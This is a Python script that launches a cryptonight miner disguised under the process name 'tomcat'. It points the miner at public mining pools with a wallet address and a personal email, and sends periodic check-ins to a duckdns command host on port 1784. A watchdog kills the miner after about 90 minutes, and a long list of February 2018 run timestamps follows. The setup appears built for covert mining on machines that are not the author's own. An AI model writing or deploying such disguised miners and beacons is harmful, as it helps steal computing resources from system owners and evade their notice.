import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:04:04.913693
#2018-02-17 16:51:05.431461
#2018-02-17 18:39:04.257719
#2018-02-17 20:27:04.064474
#2018-02-17 22:13:06.188719
#2018-02-17 23:57:07.136168
#2018-02-18 01:48:05.373649
#2018-02-18 03:37:05.305483
#2018-02-18 05:25:05.958115
#2018-02-18 07:17:02.112345
#2018-02-18 09:04:05.703649
#2018-02-18 10:51:02.126818
#2018-02-18 12:37:05.347871
#2018-02-18 14:23:04.449639
#2018-02-18 16:13:05.678162
#2018-02-18 18:02:01.338223
#2018-02-18 19:49:01.492371
#2018-02-18 21:34:08.207214
#2018-02-18 23:23:05.387788
#2018-02-19 01:11:03.598986
#2018-02-19 02:56:07.776906
#2018-02-19 04:43:05.300149
#2018-02-19 06:28:07.153628
#2018-02-19 08:18:05.604054
#2018-02-19 10:07:06.916471
#2018-02-19 11:56:05.826331
#2018-02-19 13:43:07.046176
#2018-02-19 15:32:01.453979
#2018-02-19 17:19:08.085917
#2018-02-19 19:06:07.632551
#2018-02-19 20:53:01.663696
#2018-02-19 22:41:06.610556
#2018-02-20 00:25:01.760952
#2018-02-20 02:12:07.531821
#2018-02-20 04:02:06.158139
#2018-02-20 05:45:07.872795
#2018-02-20 07:31:05.809398
#2018-02-20 09:16:05.388923
#2018-02-20 10:59:04.299409
#2018-02-20 12:46:06.193816
#2018-02-20 14:31:09.557692
#2018-02-20 16:16:13.614132
#2018-02-20 18:04:06.884771
#2018-02-20 19:56:01.320761
#2018-02-20 21:43:06.577833
#2018-02-20 23:26:06.794033
#2018-02-21 01:10:02.234812
#2018-02-21 02:55:07.549385
#2018-02-21 04:43:07.235070
#2018-02-21 06:31:06.103830
#2018-02-21 08:16:04.314498
#2018-02-21 10:01:10.295679
#2018-02-21 11:49:14.308220
#2018-02-21 13:40:04.134103
#2018-02-21 15:23:09.944822
#2018-02-21 17:13:08.512208
#2018-02-21 19:01:01.661383
#2018-02-21 20:50:08.281109
#2018-02-21 22:36:04.484150
#2018-02-22 00:25:08.289258
#2018-02-22 02:14:06.805596
#2018-02-22 04:01:02.073175
#2018-02-22 05:47:01.536899
#2018-02-22 07:33:04.789570
#2018-02-22 09:21:03.938320
#2018-02-22 11:07:01.492782
#2018-02-22 12:52:01.650864
#2018-02-22 14:39:08.868480
#2018-02-22 16:25:12.277335
#2018-02-22 18:13:06.108613
#2018-02-22 20:03:05.834275
#2018-02-22 21:51:08.691987
#2018-02-22 23:39:07.773095
#2018-02-23 01:27:01.880288
#2018-02-23 03:13:04.863971
#2018-02-23 04:59:01.469181
#2018-02-23 06:44:07.218293
#2018-02-23 08:36:04.223877
#2018-02-23 10:49:10.056480
#2018-02-23 12:47:16.386041
#2018-02-23 14:31:11.509606
#2018-02-23 16:21:05.045122
#2018-02-23 18:07:07.742660
#2018-02-23 19:54:03.940520
#2018-02-23 21:39:07.400362
#2018-02-23 23:26:07.469103
#2018-02-24 01:19:06.632988
#2018-02-24 03:09:06.329071
#2018-02-24 04:55:06.566440
#2018-02-24 06:40:01.561130
#2018-02-24 08:29:02.076489
#2018-02-24 10:16:07.096911
#2018-02-24 12:11:07.868112
#2018-02-24 13:58:04.910315
#2018-02-24 15:49:06.481215
#2018-02-24 17:36:08.288332
#2018-02-24 19:22:05.673923
#2018-02-24 21:12:07.772945
#2018-02-24 23:46:03.758935
#2018-02-25 03:43:05.515785
#2018-02-25 07:28:04.415999